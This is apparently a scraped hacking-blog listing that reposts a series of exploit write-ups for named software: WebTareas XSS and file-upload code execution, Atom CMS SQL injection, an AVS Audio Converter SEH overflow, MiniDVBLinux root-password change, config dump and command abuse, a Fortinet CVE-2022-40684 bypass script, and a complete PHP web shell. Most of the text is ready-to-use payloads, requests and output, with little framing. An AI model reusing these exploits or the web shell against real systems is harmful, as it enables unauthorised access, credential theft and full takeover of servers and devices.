form-data; name="post_content" <p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p> -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="create_post" Publish Post -----------------------------369779619541997471051134453116-- ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.
  10. HireHackking

    WebTareas 2.4 - Reflected XSS (Unauthorised)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://sourceforge.net/projects/webtareas/ # Software Link: https://sourceforge.net/projects/webtareas/ # Version: 2.4 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Proof Of Concept ----------------------------------------------------------------------------------------------------------------------- Param: searchtype ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- GET /webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/webtareas/general/search.php?searchtype=simple Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 07:46:31 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 11147 [...] <form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)"> [...] ----------------------------------------------------------------------------------------------------------------------- Other vulnerable url and params: ----------------------------------------------------------------------------------------------------------------------- /webtareas/administration/print_layout.php [doc_type] /webtareas/general/login.php [logout] /webtareas/general/login.php [session] /webtareas/general/newnotifications.php [msg] /webtareas/general/search.php [searchtype] /webtareas/administration/print_layout.php [doc_type]
  11. HireHackking

    Atom CMS v2.0 - SQL Injection (no auth)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Atom CMS v2.0 - SQL Injection (no auth) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://github.com/thedigicraft/Atom.CMS # Software Link: https://github.com/thedigicraft/Atom.CMS # Version: 2.0 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example ----------------------------------------------------------------------------------------------------------------------- Param: id ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /Atom.CMS-master/admin/index.php?page=users&id=(select*from(select(sleep(10)))a) HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 93 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/Atom.CMS-master/admin/index.php?page=users&id=1 Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 first=Alan2n&last=Quandt&email=alan%40alan.com&status=1&password=&passwordv=&submitted=1&id=1 --------------------------------------------------------------------------------------------------------------------- -- Response wait 10 sec ----------------------------------------------------------------------------------------------------------------------- Other URL and params ----------------------------------------------------------------------------------------------------------------------- /Atom.CMS-master/admin/index.php [email] /Atom.CMS-master/admin/index.php [id] /Atom.CMS-master/admin/index.php [slug] /Atom.CMS-master/admin/index.php [status] /Atom.CMS-master/admin/index.php [user]
  12. HireHackking

    WebTareas 2.4 - RCE (Authorized)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WebTareas 2.4 - RCE (Authorized) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://sourceforge.net/projects/webtareas/ # Software Link: https://sourceforge.net/projects/webtareas/ # Version: 2.4 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example in forum -> members forum -> chat ----------------------------------------------------------------------------------------------------------------------- Param: chatPhotos0 ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /webtareas/includes/chattab_serv.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------13392153614835728094189311126 Content-Length: 6852 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------13392153614835728094189311126 Content-Disposition: form-data; name="action" sendPhotos -----------------------------13392153614835728094189311126 Content-Disposition: form-data; name="chatTo" 2 -----------------------------13392153614835728094189311126 Content-Disposition: form-data; name="chatType" P -----------------------------13392153614835728094189311126 Content-Disposition: form-data; name="chatPhotos0"; filename="snupi.php" Content-Type: image/png PNG [...] <?php phpinfo();?> [...] ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 11:27:41 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 661 Connection: close Content-Type: application/json {"content":"<div class=\"message\"><div class=\"message-left\"><img class=\"avatar\" src=\"..\/includes\/avatars\/f2.png?ver=1665796223\"><\/div><div class=\"message-right\"><div class=\"message-info\"><div class=\"message-username\">Administrator<\/div><div class=\"message-timestamp\">2022-10-15 13:27<\/div><\/div><div class=\"photo-box\"><img src=\"..\/files\/Messages\/7.php\" onclick=\"javascript:showFullscreen(this);\"><div class=\"photo-action\"><a href=\"..\/files\/Messages\/7.php\" download=\"snupi.php\"><img title=\"Zaoszcz\u0119dzi\u0107\" src=\"..\/themes\/camping\/btn_download.png\"><\/a><\/div><label>snupi.php<\/label><\/div><\/div><\/div>"} ----------------------------------------------------------------------------------------------------------------------- See link: /files\/Messages\/7.php ----------------------------------------------------------------------------------------------------------------------- Req: ----------------------------------------------------------------------------------------------------------------------- GET /webtareas/files/Messages/7.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,*/* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: same-origin ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 11:28:16 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 89945 [...] <title>PHP 7.4.30 - phpinfo()</title> [...] <h1 class="p">PHP Version 7.4.30</h1> </td></tr> </table> <table> <tr><td class="e">System </td><td class="v">Windows NT DESKTOP-LE3LSIM 10.0 build 19044 (Windows 10) AMD64 </td></tr> <tr><td class="e">Build Date </td><td class="v">Jun 7 2022 16:22:15 </td></tr> <tr><td class="e">Compiler </td><td class="v">Visual C++ 2017 [...]
  13. HireHackking

    AVS Audio Converter 10.3 - Stack Overflow (SEH)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH) # Discovered by: Yehia Elghaly - Mrvar0x # Discovered Date: 2022-10-16 # Tested Version: 10.3.1.633 # Tested on OS: Windows 7 Professional x86 #pop+ret Address=005154E6 #Message= 0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe) # The only module that has SafeSEH disabled. # Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | # 0x00400000 | 0x01003000 | False | False | False | False | False | #Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes. #Buffer = '\x41'* 260 #nSEH = '\x42'*4 #SEH = '\x43'*4 #ESI = 'D*44' # ESI Overwrite #buffer = "A"*260 + [nSEH] + [SEH] + "D"*44 #buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44 # Rexploit: # Generate the 'evil.txt' payload using python 2.7.x on Linux. # Open the file 'evil.txt' Copy. # Paste at'Output Folder and click 'Browse'. #!/usr/bin/python -w filename="evil.txt" buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44 textfile = open(filename , 'w') textfile.write(buffer) textfile.close()
  14. HireHackking

    MiniDVBLinux 5.4 - Change Root Password

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MiniDVBLinux 5.4 - Change Root Password # Exploit Author: LiquidWorm MiniDVBLinux 5.4 Change Root Password PoC Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application allows a remote attacker to change the root password of the system without authentication (disabled by default) and verification of previously assigned credential. Command execution also possible using several POST parameters. Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5715 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php 24.09.2022 -- Default root password: mld500 Change system password: ----------------------- POST /?site=setup&section=System HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 Cache-Control: max-age=0 Connection: keep-alive Content-Length: 778 Content-Type: application/x-www-form-urlencoded Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba Host: ip:8008 Origin: http://ip:8008 Referer: http://ip:8008/?site=setup&section=System Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 sec-gpc: 1 APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+ Pretty post data: APT_UPGRADE_CHECK: 1 APT_SYSTEM_ID: 1 APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass APT_PACKAGE_CLASS: stable SYSTEM_NAME: MiniDVBLinux SYSTEM_VERSION_command: /etc/setup/base.sh setversion SYSTEM_VERSION: 5.4 SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword SYSTEM_PASSWORD: r00t BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd BUSYBOX_NTPD: 1 LOG_LEVEL: 1 SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog SYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlang LANG: en_GB.UTF-8 TIMEZONE_command: /etc/setup/locales.sh settimezone TIMEZONE: Europe/Kumanovo KEYMAP_command: /etc/setup/locales.sh setkeymap KEYMAP: de-latin1 action: save params: changed: SYSTEM_PASSWORD Eenable webif password check: ----------------------------- POST /?site=setup&section=System HTTP/1.1 APT_UPGRADE_CHECK: 1 APT_SYSTEM_ID: 1 APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass APT_PACKAGE_CLASS: stable SYSTEM_NAME: MiniDVBLinux SYSTEM_VERSION_command: /etc/setup/base.sh setversion SYSTEM_VERSION: 5.4 SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword SYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd BUSYBOX_NTPD: 1 LOG_LEVEL: 1 SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog SYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlang LANG: en_GB.UTF-8 TIMEZONE_command: /etc/setup/locales.sh settimezone TIMEZONE: Europe/Berlin KEYMAP_command: /etc/setup/locales.sh setkeymap KEYMAP: de-latin1 WEBIF_PASSWORD_CHECK: 1 action: save params: changed: WEBIF_PASSWORD_CHECK Disable webif password check: ----------------------------- POST /?site=setup&section=System HTTP/1.1 APT_UPGRADE_CHECK: 1 APT_SYSTEM_ID: 1 APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass APT_PACKAGE_CLASS: stable SYSTEM_NAME: MiniDVBLinux SYSTEM_VERSION_command: /etc/setup/base.sh setversion SYSTEM_VERSION: 5.4 SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword SYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd BUSYBOX_NTPD: 1 LOG_LEVEL: 1 SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog SYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlang LANG: en_GB.UTF-8 TIMEZONE_command: /etc/setup/locales.sh settimezone TIMEZONE: Europe/Berlin KEYMAP_command: /etc/setup/locales.sh setkeymap KEYMAP: de-latin1 action: save params: changed: WEBIF_PASSWORD_CHECK
  15. HireHackking

    MiniDVBLinux <=5.4 - Config Download Exploit

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MiniDVBLinux <=5.4 Config Download Exploit # Exploit Author: LiquidWorm Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application is vulnerable to unauthenticated configuration download when direct object reference is made to the backup function using an HTTP GET request. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and full system access. ==================================================================== /var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh: ------------------------------------------------------------ 01: <? 02: if [ "$GET_action" = "getconfig" ]; then 03: . /etc/rc.config 04: header "Content-Type: application/x-compressed-tar" 05: header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz" 06: /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null 07: cat /tmp/backup_config_$$.tgz 08: rm -rf /tmp/backup_config* 09: exit 10: fi 11: ?> 12: <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div> ==================================================================== Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5713 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php 24.09.2022 -- > curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz > mkdir configdir > tar -xvzf config.tgz -C .\configdir > cd configdir && cd etc > type passwd root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh daemon:!:1:1::/: ftp:!:40:2:FTP account:/:/bin/sh user:!:500:500::/home/user:/bin/sh nobody:!:65534:65534::/tmp: _rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin >
  16. HireHackking

    FortiOS, FortiProxy, FortiSwitchManager v7.2.1 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager) # Date: 13/10/2022 # Exploit Author: Felipe Alcantara (Filiplain) # Vendor Homepage: https://www.fortinet.com/ # Version: #FortiOS from 7.2.0 to 7.2.1 #FortiOS from 7.0.0 to 7.0.6 #FortiProxy 7.2.0 #FortiProxy from 7.0.0 to 7.0.6 #FortiSwitchManager 7.2.0 #FortiSwitchManager 7.0.0 # Tested on: Kali Linux # CVE : CVE-2022-40684 # https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass # Usage: ./poc.sh <ip> <port> # Example: ./poc.sh 10.10.10.120 8443 #!/bin/bash red="\e[0;31m\033[1m" blue="\e[0;34m\033[1m" yellow="\e[0;33m\033[1m" end="\033[0m\e[0m" target=$1 port=$2 vuln () { echo -e "${yellow}[+] Dumping System Information: ${end}" timeout 10 curl -s -k -X $'GET' \ -H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\": gzip, deflate' -H $'Forwarded: by=\"[127.0.0.1]:80\";for=\"[127.0.0.1]:49490\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.out if [ "$?" == "0" ];then grep "results" ./$target.out >/dev/null if [ "$?" == "0" ];then echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}" else rm -f ./$target.out echo -e "${red}Not Vulnerable ${end}" fi else echo -e "${red}Not Vulnerable ${end}" rm -f ./$target.out fi } vuln
  17. HireHackking

    MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE) # Exploit Author: LiquidWorm MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application allows the usage of the SVDRP protocol/commands to be sent by a remote attacker to manipulate and/or control remotely the TV. Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5714 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php 24.09.2022 -- Send a message to the TV screen: curl http://ip:8008/?site=commands&section=system&command=svdrpsend.sh%20MESG%20WE%20ARE%20WATCHING%20YOU! 220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8 250 Message queued 221 mld closing connection For more commands: - https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands
  18. HireHackking

    MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure # Exploit Author: LiquidWorm MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application suffers from an unauthenticated live stream disclosure when /tpl/tv_action.sh is called and generates a snapshot in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP). -------------------------------------------------------------------- /var/www/tpl/tv_action.sh: -------------------------- 01: #!/bin/sh 02: 03: header 04: 05: quality=60 06: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")" 07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null -------------------------------------------------------------------- Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5716 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php 24.09.2022 -- 1. Generate screengrab: - Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*" - Response: 220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8 250 Grabbed image /tmp/tv.jpg 60 221 mld closing connection 2. View screengrab: - Request: curl http://ip:8008/images/tv.jpg 3. Or use a browser: - http://ip:8008/home?site=remotecontrol
  19. HireHackking

    Beauty-salon v1.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: Beauty-salon v1.0 - Remote Code Execution (RCE) ## Exploit Author: nu11secur1ty ## Date: 10.12.2022 ## Vendor: https://code4berry.com/projects/beautysalon.php ## Software: https://code4berry.com/project%20downloads/beautysalon_download.php ## Reference: https://github.com/nu11secur1ty/NVE/blob/NVE-master/2022/NVE-2022-1012.txt ## Description: The parameter `userimage` from Beauty-salon-2022 suffers from Web Shell-File Upload - RCE. NOTE: The user permissions of this system are not working correctly, and the function is not sanitizing well. The attacker can use an already created account from someone who controls this system and he can upload a very malicious file by using this vulnerability, or more precisely (no sanitizing of function for edit image), for whatever account, then he can execute it from anywhere on the external network. Status: HIGH Vulnerability [+] Exploit: ```php <!-- Project Name : PHP Web Shell --> <!-- Version : 4.0 nu11secur1ty --> <!-- First development date : 2022/10/05 --> <!-- This Version development date : 2022/10/05 --> <!-- Moded and working with PHP 8 : 2022/10/05 --> <!-- language : html, css, javascript, php --> <!-- Developer : nu11secur1ty --> <!-- Web site : https://www.nu11secur1ty.com/ --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" " http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html" charset="euc-kr"> <title>PHP Web Shell Ver 4.0 by nu11secur1ty</title> <script type="text/javascript"> function FocusIn(obj) { if(obj.value == obj.defaultValue) obj.value = ''; } function FocusOut(obj) { if(obj.value == '') obj.value = obj.defaultValue; } </script> </head> <body> <b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?></b><br><br> HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br> REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br> <br> <form name="cmd_exec" method="post" action="http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>"> <input type="text" name="cmd" size="70" maxlength="500" value="Input command to execute" onfocus="FocusIn(document.cmd_exec.cmd)" onblur="FocusOut(document.cmd_exec.cmd)"> <input type="submit" name="exec" value="exec"> </form> <?php if(isset($_POST['exec'])) { exec($_POST['cmd'],$result); echo '----------------- < OutPut > -----------------'; echo '<pre>'; foreach($result as $print) { $print = str_replace('<','<',$print); echo $print . '<br>'; } echo '</pre>'; } else echo '<br>'; ?> <form enctype="multipart/form-data" name="file_upload" method="post" action="http://<?php echo $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>"> <input type="file" name="file"> <input type="submit" name="upload" value="upload"><br> <input type="text" name="target" size="100" value="Location where file will be uploaded (include file name!)" onfocus="FocusIn(document.file_upload.target)" onblur="FocusOut(document.file_upload.target)"> </form> <?php if(isset($_POST['upload'])) { $check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']); if($check == TRUE) echo '<pre>The file was uploaded successfully!!</pre>'; else echo '<pre>File Upload was failed...</pre>'; } ?> </body> </html> ``` # Proof and Exploit: [href](https://streamable.com/ewdmoh) # m0e3: [href]( https://www.nu11secur1ty.com/2022/10/beauty-salon-2022-web-shell-file-upload.html ) System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and 